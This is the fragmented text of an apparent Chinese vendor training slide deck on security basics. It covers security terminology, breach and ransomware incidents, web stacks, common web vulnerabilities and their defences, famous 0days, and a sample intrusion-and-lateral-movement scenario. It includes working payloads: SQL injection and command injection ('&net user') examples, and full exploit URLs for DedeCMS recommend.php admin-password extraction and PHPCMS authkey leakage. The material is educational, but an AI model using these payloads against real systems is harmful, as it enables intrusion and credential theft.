深信服-2018渠道售前安全初级认证-安全基础-安全知识培训电子教案.ppt

标题文本,正文级别 1,正文级别 2,正文级别 3,正文级别 4,正文级别 5,*,Sept.,2017,安全知识培训,培训内容,培训目标,1,、安全常识,2,、,web,构成,3,、常见,web,漏洞,4,、常见的,0day,攻击,5,、黑客入侵流程,了解漏洞、攻击、入侵的含义，相关的安全常识并了解著名的安全事件，以及,web,常见的漏洞，了解黑客常见的入侵手段和流程，可作为自身安全基础的积累和谈资,安全常识,安全常识,什么是漏洞,安全漏洞是信息系统在生命周期的各个阶段（设计、实现、运维等过程）中产生的某类问题，这些问题会对系统的安全（机密性、完整性、可用性）产生影响。,Bug,漏洞,漏洞与,Bug,并不等同，他们之间的关系基本可以描述为：大部分的,Bug,影响功能性，并不涉及安全性，也就不构成漏洞；大部分的漏洞来源于,Bug,，但并不是全部，它们之间只是有一个很大的交集。,安全常识,什么是攻击,利用网络存在的漏洞和安全缺陷对网络系统的硬件、软件及其系统中的数据进行的攻击。包括,主动攻击,：篡改、伪造消息数据和拒绝服务攻击（,DDOS,）等，,被动攻击,：流量分析、窃听等,什么是入侵,网络入侵（,hacking,）通常是指具有熟练地编写和调试计算机程序的技巧，并使用这些技巧来获得非法或未授权的网络或文件访问，入侵进入公司内部网的行为,区别,入侵是指任何威胁和破坏系统资源的行为，攻击是入侵者为进行入侵所采取的技术手段和方法。,安全术语,后门,绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统。,webshell,webshell,就是以,asp,、,php,、,jsp,或者,cgi,等网页文件形式存在的一种命令执行环境，也可以将其称作为一种网页后门。,安全术语,0day,漏洞,通常是指还没有补丁的漏洞。也就是说官方还没有发现或者是发现了还没有开发出安全补丁的漏洞,exploit,简称,exp,，漏洞利用,安全术语,提权,提高自己在服务器中的权限，主要针对网站入侵过程中，当入侵某一网站时，通过各种漏洞提升,WEBSHELL,权限以夺得该服务器权限。,跳板,跳板，简单来说，就是为了隐藏自己的地址，让别人无法查找到自己的位置。,安全术语,拖库,网站遭到入侵后，黑客窃取其数据库。,社会工程学,一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段取得自身利益的手法，已成迅速上升甚至滥用的趋势。,Apt,攻击,高级持续性威胁。利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式,安全事件举例,信息泄露事件,1,、快递公司官网遭入侵 泄露,1400,万用户快递数据,2014,年,8,月,12,日，警方破获了一起信息泄露案件，犯罪嫌疑人通过快递公司官网漏洞，登录网站后台，然后再通过上传,(,后门,),工具就能获取该网站数据库的访问权限，获取了,1400,万条用户信息，除了有快递编码外，还详细记录着收货和发货双方的姓名、电话号码、住址等个人隐私信息。,2,、机锋网,2700,万用户数据泄露,2015,年,1,月,5,日上午，知名微博账号“互联网的那点事”发布消息称，机锋论坛,2300,万用户数据泄露，包含用户名、邮箱、加密密码在内的用户信息在网上疯传，提醒用户抓紧修改密码。,安全事件举例,信息泄露事件,3,、小米,800,万用户数据泄露,4,、,130,万考研用户信息被泄露,5,、智联招聘,86,万条求职简历数据遭泄露,6,、,12306,网站超,13,万用户数据遭泄露,7,、汉庭,2000,万开房记录遭泄露,安全事件举例,信息泄露事件,安全事件举例,DDOS,2017,年,1,月至,6,月，游戏行业大于,300G,以上的攻击超过,1800,次，最大峰值为,608G,；游戏公司每月平均被攻击次数为,800,余次。在,2017,年,1,月至,3,月为攻击最猖獗的时期，平均每天有,30,多次攻击。,而在攻击源方面，,94%,的攻击源都位于国内，,6%,的攻击源来自国外。,安全事件举例,病毒木马事件,Wannacry,WannaCry,（又叫,Wanna Decryptor,），一种“蠕虫式”的勒索病毒软件，由不法分子利用,NSA,（,National Security Agency,，美国国家安全局）泄露的危险漏洞“,EternalBlue”,（永恒之蓝）进行传播。最新统计数据显示，,100,多个国家和地区超过,10,万台电脑遭到了勒索病毒攻击、感染。勒索病毒是自熊猫烧香以来影响力最大的病毒之一。,WannaCry,勒索病毒全球大爆发，至少,150,个国家、,30,万名用户中招，造成损失达,80,亿美元，已经影响到金融，能源，医疗等众多行业，造成严重的危机管理问题。中国部分,Windows,操作系统用户遭受感染，校园网用户首当其冲，受害严重，大量实验室数据和毕业设计被锁定加密。部分大型企业的应用系统和数据库文件被加密后，无法正常工作，影响巨大。,安全事件举例,病毒木马事件,Petya,Petya,是,2017,年,3,月出现的一种变体勒索软件，是一种类似于“,WannaCry”,的新勒索病毒，它的破坏性比传统的勒索软件更大，现已导致俄罗斯石油公司,(RosneftPJSC),和丹麦,A.P.,穆勒,-,马士基有限公司等在内的多家大型企业被攻击，而且乌克兰的政府系统也遭到了该病毒的袭击。并已确认有国内企业中招。腾讯电脑管家称已确认病毒样本通过永恒之蓝漏洞传播。,北京时间,2017,年,6,月,27,日晚，乌克兰、俄罗斯、印度、西班牙、法国、英国以及欧洲多国正在遭遇,Petya,类勒索病毒袭击，政府、银行、电力系统、通讯系统、企业以及机场都不同程度地受到了影响。,安全事件举例,病毒木马事件,暗云,III,“暗云”是目前已知复杂度最高、感染用户数量最大的木马之一。通过复杂、新颖的技术，“暗云”可长期潜伏在用户的计算机系统中。中毒用户会成为受控“肉鸡”，作为,DDoS,网络攻击的源头，并导致网络变卡、用户信息被窃取等安全问题。有全网普查显示，该木马已感染了数以百万的计算机。,Web,构成,web应用工作原理,静态网页：,html或者htm，是一种静态的页面格式，不需要服务器解析其中的脚本。由浏览器如(IE、Chrome等)解析。,1.不依赖数据库,2.灵活性差，制作、更新、维护麻烦,3.交互性交差，在功能方面有较大的限制,4.安全，不存在SQL注入漏洞,动态网页：,asp、aspx、php、jsp等，由相应的脚本引擎来解释执行，根据指令生成静态网页。,1.依赖数据库,2.灵活性好，维护简便,3.交互性好，功能强大,4.存在安全风险，可能存在SQL注入漏洞,web应用工作原理,客 户 端,数 据 库,脚本引擎,用户想要查看,一篇报道，这篇报道的,id,号为,36,请,求,返,回,访问的链接为,*from Article where id=36，向数据库发起查询请求,在Article表中查询id为36的所有记录,返回查询到的所有记录,处理返回的所有记录，如过滤和编码特殊字符等，生成静态网页并返回给客户端,将网站返回的网页展示给用户,正常用户访问网页的具体流程如下图：,漏洞利用流程,客 户 端,数 据 库,脚本引擎,黑客,想要,获取管理员账号密码,请,求,返,回,黑客构造链接,*from Article where id=36,union select user,pass from admin,，向数据库发起查询请求,在Article表中查询id为36的所有记录,并查询了管理员账号密码,返回查询到的所有记录,处理返回的所有记录，如过滤和编码特殊字符等，生成静态网页并返回给客户端,将网站返回的网页展示给用户,（此时的内容就含有管理员信息）,黑客攻击网站（,sql,注入）的具体流程如下图：,服务器,Windows,代表：,Windows2003,、,Windows2008,、,常见漏洞：“永恒之蓝”（,MS17-010,），,MS08-067(,比较古老但很经典的漏洞,),Linux,代表,Ubuntu,、,Centos,、,Redha,t,常见漏洞：脏牛漏洞、,sudo,漏洞,web服务器,Web 服务器也称为 HTTP 服务器，它是响应来自浏览器的HTTP请求，并且发送出网页文件的软件。,当访问者在浏览器的地址文本框中输入一个 URL，或者单击在浏览器中打开的 网页上的某个链接时，便生成一个网页请求。,常见的web服务器：IIS、Apache、Nginx、tomcat、weblogic.,web服务器,IIS,IIS（Internet 信息服务器）是Internet Information Services的缩写，是微软提供的Internet服务器软件，包括WEB、FTP、SMTP等服务器组件。,常见漏洞：,IIS,短文件泄露、,IIS,解析漏洞、,IIS6.0,远程代码执行,Apache,Apache是Apache软件基金会的一个开放源码的网页服务器，世界使用排名第一的Web服务器软件,常见漏洞：,apache,解析漏洞、,Apache,日志文件漏洞,web服务器,Nginx,Nginx,是一个高性能的,HTTP,和反向代理服务器，也是一个,IMAP/POP3/SMTP,服务器。,常见漏洞：,Nginx,解析漏洞、整数溢出漏洞,Tomcat,Tomcat 服务器是一个免费的开放源代码的Web 应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP 程序的首选。,常见漏洞：,tomcat,弱口令、,tomcat,远程代码执行、本地提权,web服务器,Weblogic,Weblogic,是一个基于,JAVAEE,架构的中间件，,WebLogic,是用于开发、集成、部署和管理大型分布式,Web,应用、网络应用和数据库应用的,Java,应用服务器。,常见漏洞：,java,反序列化、,SSRF(,服务器端请求伪造,),数据库,数据库,数据库是按照数据结构来组织、存储和管理数据的“仓库”。,结构化查询语言,结构化查询语言(Structured Query Language)简称SQL，结构化查询语言是一种数据库查询和程序设计语言，用于存取数据以及查询、更新和管理关系数据库系统。,数据库分类,MySQL,、,MSSQL,、,Access,、,Oracle,、,Sqlite,数据库管理软件,P,hpmyadmin,、,navicat,开发语言及常见框架/cms,PHP,开发框架：,CodeIgniter、ThinkPHP,cms(内容管理系统):phpcms、dedecms、qibocms.,ASP,cms:aspcms、动易cms、南方数据.,.NET,cms:SiteServer,JSP,开发框架：struts2、Spring MVC,cms:jeecms、大汉cms,web,常见架构,LAMP,Linux+Apache+MySQL+PHP,适用于大型网站架构，稳定性高，常见于企业网站,WAMP,Windows+Apache+MySQL+PHP,适用于中小型网站架构，易于管理，常见于教育（大学等）、政府事业单位（常用,phpcms,作为网站,cms,）,web,常见架构,其他常见组合：,PHP+IIS,（,IIS,常和,asp,和,aspx,搭配）,部分网站可能会使用这种架构，但是偏少,ASP+IIS,常见于学校，政府（地方）等单位,.NET+IIS,（,aspx,）,常见于学校（比如正方教务系统），政府，医院等，部分企业网站也会使用这种架构,JSP+Tomcat,金融、政府（大型，一般市级以上会是,jsp,的）,大学主站,常见漏洞,常见漏洞,A1-,注入,A3-,跨站脚本（,XSS,）,A4-,不安全的直接对象引用,A5-,安全配置错误,A6-,敏感信息泄露,A7-,功能级访问控制缺失,A8-,跨站请求伪造（,CSRF,）,A9-,使用含有已知漏洞的组件,A10-,未验证的重定向和转发,A2-,失效的身份认证和会话管理,SQL,注入危害,这些危害包括但不局限于：,数据库信息泄漏：数据库中存放的用户的隐私信息的泄露。,网页篡改：通过操作数据库对特定网页进行篡改。,网站被挂马，传播恶意软件：修改数据库一些字段的值，嵌入网马链接，进行挂马攻击。,数据库被恶意操作：数据库服务器被攻击，数据库的系统管理员帐户被窜改。,服务器被远程控制，被安装后门。经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统。,破坏硬盘数据，瘫痪全系统。,一些类型的数据库系统能够让,SQL,指令操作文件系统，这使得,SQL,注入的危害被进一步放大。,SQL,注入,sql,注入攻击漏洞，攻击者把不可信的数据作为命令或者查询语句的一部分，发送给解释器的，以执行计划外的命令或者在未被恰当授权时访问数据。,举个例子,:,网站后台代码的,sql,语句构建如下,$sql=“select*from user where id=$id”,正常的,url,如下,and 1=1,后台语句构建如下,select*from user where id=1 and,1=1,会返回和,id=1,一样的回显信息。,若是访问,and 1=2,后台语句构建如下,select*from user where id=1 and,1=2,会返回和,id=1,不一样的回显信息,and 1=1,和,and 1=2,都是注入的,sql,语句，将其换成特定语句会导致攻击者执行任意,sql,语句。,SQL,注入直观效果,Sqlmap SQL,注入爆出数据库表名,SQL,注入的防御,过滤特殊字符：,单引号、双引号、斜杠、反斜杠、冒号、空字符等的字符,过滤的对象,:,用户的输入,提交的,URL,请求中的参数部分,从,cookie,中得到的数据,部署防,SQL,注入系统或脚本,跨站脚本（,XSS,）的危害,网络钓鱼，包括盗取各类用户账号,窃取用户,cookie,资料，从而获取用户隐私信息，或利用用户身份进一步对网站执行操作,劫持用户（浏览器）会话，从而执行任意操作，例如进行非法转账，强制发表日志，发送电子邮件等,强制弹出广告页面，刷流量等,网页挂马,进行恶意操作，例如任意篡改页面信息，删除文章等,进行大量的客户端攻击，如,DDOS,攻击,获取客户端信息，例如用户的浏览历史，真实,ip,，开放端口等,控制受害者机器向其他网站发起攻击,结合其他漏洞进一步扩大攻击,提升用户权限，包括进一步渗透网站,传播,XSS,跨站脚本蠕虫等,。,跨站脚本（,XSS,）,当应用程序收到含有不可信的数据，在没有进行适当的验证和转义的情况下，就将它发送给一个网页浏览器，这就会产生跨站脚本攻击（简称,XSS,）。,举个例子,后台代码如下,:,访问正常,url,如下,cookie,WEBSHELL,webshell,就是以,asp,、,php,、,jsp,或者,cgi,等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会上传,webshell,，得到一个命令执行环境，以达到控制网站服务器的目的。,WEBSHELL,的危害,:,拿到了网站的,WebShell,，就可以修改网站的文件了！比如下载文件，修改文件，删除文件等，将变得非常容易。,拿到,WebShell,权限后，如果磁盘做了安全设置以及站点独立权限设置，则这个,WebShell,可能只能对当前站点有效，无法操作其他网站的程序。如果入侵者通过执行命令，提升网站的权限后，就可以发展到入侵服务器，进而创建管理用户，达到控制整台服务器的目的。,WEBSHELL,一句话,webshell,大马,webshell,跨站请求伪造,(CSRF),跨站请求伪造，也叫,CSRF,。该攻击让登录用户的浏览器将伪造的,HTTP,请求，包括该用户的会话,cookie,和其他认证信息，发送到一个存在,CSRF,漏洞的,web,应用程序，该,web,程序将会收集这些请求。,下面将演示通过,CSRF,漏洞在用户不知情的情况下修改用户的密码的例子。,也可以这么理解,CSRF,攻击：攻击者盗用了你的身份，以你的名义进行某些非法操作。,CSRF,能够使用你的账户发送邮件，获取你的敏感信息，甚至盗走你的财产等。,CSRF,攻击原理概要,Web A,为存在,CSRF,漏洞,Web B,为攻击者的恶意网站,User C,为,Web A,的用户,正常情况下,:,A,网站修改密码的请求是,A,网站信息信任从网站,b,发来的请求，认为是用户的合法请求，用户密码被修改为,newpass,。,提交该请求后，密码修改为,newpass,。,CSRF,的防御,验证,HTTP Referer,字段,Token,验证,添加验证码,系统命令注入的危害,导致攻击者执行任意系统命令，控制主机权限。,注入系统命令查看系统用户。,系统命令注入,系统命令注入和,sql,注入类似。,不同点是,sql,注入注入的是,sql,语句，系统命令注入注入的是系统命令。,前者导致执行任意,sql,语句，后者导致执行任意系统命令。,举个例子,后台代码如下,正常请求,&net user,执行的命令就是,ping,&net user,也就是连续执行了两条命令。后面注入的,net user,也被执行。,系统命令注入的防御,尽量不要使用系统命令,在进入执行命令函数,/,方法之前，变量一定要做好过滤，对敏感字符转义,在使用动态函数之前，确保使用的函数是指定的函数之一,文件包含的危害,1,读取敏感信息文件。,Windows/system.ini,或者是,/etc/passwd,等,2,远程包含,webshell,。,3,本地包含配合文件上传,getshell,。,文件包含,开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，而无须再次编写，这种调用文件的过程被称为包含。,文件包含漏洞的产生原因是在通过引入文件时，由于传入的文件名没有经过合理的校验，或者校检被绕过，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。,举个例子,后台语言如下：,正常,url,如下：,信息。（逻辑上本不允许）,那么遍历这些,Id,，就可以收集很多敏感的信息。,越权的防御,完善代码逻辑：,1,结合,session,认证，当用户发起对一个数据资源的请求时，根据,session,中的用户,id,联合查询，倘若这个资源不属于这个用户，则不予查询。,2,针对水平越权，可以增加资源唯一标识符的复杂度，可以将其变成几十位无规律的字符串，增加水平越权的难度。但是该方法理论上仍然能被暴力破解。,常见,0day,攻击,什么是,0day,0day,漏洞,通常是指还没有补丁的漏洞。也就是说官方还没有发现或者是发现了还没有开发出安全补丁的漏洞,0day,攻击,利用,0day,漏洞进行的攻击，特点是利用简单，危害较大,常见,0day,struts2,Struts2,框架存在漏洞，平时说的存在,struts2,漏洞是指的远程命令,/,代码执行漏洞,影响范围,2017,年,3,月份报告：,常见,0day,struts2,Struts2,漏洞有很多，比较著名的几个远程命令,/,代码执行漏洞：,名称,影响版本,危害,S2-016,Struts 2.0.0-Struts 2.3.15,可获取服务器权限,S2-032,Struts 2.3.20-StrutsStruts 2.3.28(except 2.3.20.3 and 2.3.24.3),S2-037,Struts 2.3.20-StrutsStruts 2.3.28.1,S2-045,Struts 2.3.5-Struts 2.3.31,Struts 2.5-Struts 2.5.10,S2-046,Struts 2.3.5-Struts 2.3.31,Struts 2.5-Struts 2.5.10,S2-048,Struts 2.3.x with Struts 1 plugin and Struts 1 action,常见,0day,struts2,利用该漏洞可执行任意操作，例如上传,shell,，添加管理员账号等，下图我们展示的是查询,os,版本信息，以证明漏洞存在,常见,0day,java,反序列化,Java,序列化,把,Java,对象转换为字节序列的过程便于保存在内存、文件、数据库中，,ObjectOutputStream,类的,writeObject(),方法可以实现序列化。,Java,反序列化,把字节序列恢复为,Java,对象的过程，,ObjectInputStream,类的,readObject(),方法用于反序列化。,影响范围,WebLogic,、,WebSphere,、,JBoss,、,Jenkins,、,OpenNMS,这些大名鼎鼎的,Java,应用，都受到影响,危害,导致远程代码执行，获取服务器权限,常见,0day,java,反序列化,直接部署一个,webshell,，利用非常简单,常见,0day,bash,破壳漏洞,Bash,漏洞,bash,漏洞源于在调用,Bash Shell,之前可以用构造的值创建环境变量。由于没有对输入的环境变量进行检测，攻击者可以在输入的变量时候可以包含恶意代码，在,Shell,被调用后会被立即执行。,影响范围,影响目前主流的操作系统平台，包括但不限于,Redhat,、,CentOS,、,Ubuntu,、,Debian,、,Fedora,、,Amazon Linux,、,OS X 10.10,等平台,危害,黑客利用该漏洞，可以执行任意代码，甚至可以不需要经过认证，就能远程取得系统的控制权，包括执行恶意程序，或在系统内植入木马，或获取敏感信息。,常见,0day,心脏滴血漏洞,心脏滴血漏洞（,OpenSSL,心脏滴血漏洞）,未能正确检测用户输入参数的长度，攻击者可以利用该漏洞，远程读取存在漏洞版本的,OpenSSL,服务器内存中,64K,的数据，获取内存中的用户名、密码、个人相关信息以及服务器的证书等私密信息。,影响范围,该漏洞披露时，约有,17%,（大约五十万）通过认证机构认证的互联网安全网络服务器容易受到攻击,危害,通过多个测试实例表明，根据对应,OpenSSL,服务器承载业务类型，攻击者一般可获得用户,X.509,证书私钥、实时连接的用户账号密码、会话,Cookies,等敏感信息，进一步可直接取得相关用户权限，窃取私密数据或执行非授权操作。,常见,0day,永恒之蓝,永恒之蓝（英语：,EternalBlue,）,美国国家安全局（,NSA,）开发的,漏洞利用程序,，于,2017,年,4,月,14,日被黑客组织影子掮客泄漏。,Wannacry,传播利用的是,windows,的,smb,漏洞，,漏洞补丁是,MS17-010,影响范围,大多数,windows,系统都受到影响（已有相关补丁）,危害,获取服务器权限,常见,0day,samba,漏洞,linux,版“永恒之蓝”，,CVE-2017-7494,差异,Windows,的,SMB,服务默认开启，,Samba,在大多数的,Linux,发行版中需要手动开启,影响范围,漏洞影响,Samba3.5.0,及,3.5.0,和,4.6.4,之间的任意版本（不包括,4.5.10,、,4.4.14,、,4.6.4,）。,危害,可直接获取服务器,shell,常见,0day,samba,漏洞,如图，该漏洞利用模块已集成到了,metasploit,当中,无需交互即可利用，该图片展示的是已获取到服务器,shell,，可以对服务器进行任何操作,常见,0day,dedecms,Dedecms,织梦内容管理系统,recommend.php,存在,sql,注入,利用,EXP,：,url/plus/recommend.php?action,=&aid=1&_FILEStypetmp_name=%27%20or%20mid=%27%20/*!50000union*/*!50000select*/1,2,3,(select%20CONCAT(0 x7c,userid,0 x7c,pwd)+from+%23_admin%20limit+0,1),5,6,7,8,9%23&_FILEStypename=1.jpg&_FILEStypetype=application/octet-stream&_FILEStypesize=4294,危害：上述,exp,可获取管理员密码,常见,0day,dedecms,若存在该漏洞，访问上述链接即可获得管理员账号密码，如下图：,常见,0day,phpcms,Phpcms,，,PHPCMS V9,内容管理系统,Authkey,泄露、,17,年最新,getshell,0day,Authkey,泄露,利用,EXP,：,url/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V,危害：若存在该漏洞，访问上述链接,authkey,会泄露，可利用,authkey,进行注入,黑客入侵流程,情景说明,内网说明：内网中有若干网段。外网服务器区，内网服务器区，办公,pc,区。各个网段通过路由器互相通信。,Internet,OA/ERP,vlan10,192.168.10.0/24,财务部,技术部,门户,攻击目标,跳板,2,pc,跳板,1,web,坏小子,某天，坏小子接到一个入侵某企业内网,erp/oa,系统的活，但是该系统只对内网开放，公网上的坏小子无法直接访问。,那么，坏小子是如何一步步入侵该内网服务的呢？,入侵思路,为了入侵内网,erp/oa,系统，黑客必须首先拿到内网中的一台主机权限，将其作为跳板机横向移动，继续入侵,erp,系统。,如何获得内网中的一台主机权限,思路,1,：拿下某一服务器,下面给出一个利用高危漏洞,-,利用,sql,注入,getshell,的实例。,Sql,注入,getshell,流程,Sql,注入,getshell,流程,黑客通过扫描，发现,sql,注入漏洞,使用,sqlmap,注入得到管理员账号密码,解密密码,利用账号登录后台，上传,webshell,思路,2,：拿下某一,PC,入侵思路,至此，黑客已经得到了一台内网主机的权限。,下一步就是利用该跳板机横向移动，内网渗透。获取内网中更有价值的信息。,例如,erp,系统，或者其他数据服务器。,横向移动,横向移动,扫描内网,横向移动,获取核心数据,内网沦陷,组建僵尸网络,所有文件被勒索软件加密为,MP4,文件,深圳市南山区学苑大道1001号南山智园A1栋,0755-86627888,market,